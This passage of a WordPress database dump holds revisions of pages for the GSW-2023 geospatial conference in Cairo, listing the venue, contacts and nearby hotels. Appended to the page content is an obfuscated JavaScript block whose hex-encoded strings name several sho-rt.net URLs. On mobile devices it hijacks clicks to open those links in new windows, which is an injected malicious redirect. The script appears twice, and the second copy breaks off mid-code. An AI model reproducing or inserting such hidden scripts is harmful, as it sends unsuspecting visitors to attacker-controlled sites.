!important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 04:45:39','2023-02-04 04:45:39','',3066,'https://gsw2023.com/?p=3748',0,'revision','',0),
(3749,1,'2023-02-04 05:39:45','2023-02-04 05:39:45','[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\" target=\"_blank\" rel=\"noopener\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]\r\n<ul>\r\n 	<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]\r\n<ul>\r\n 	<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]\r\n<ul>\r\n 	<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 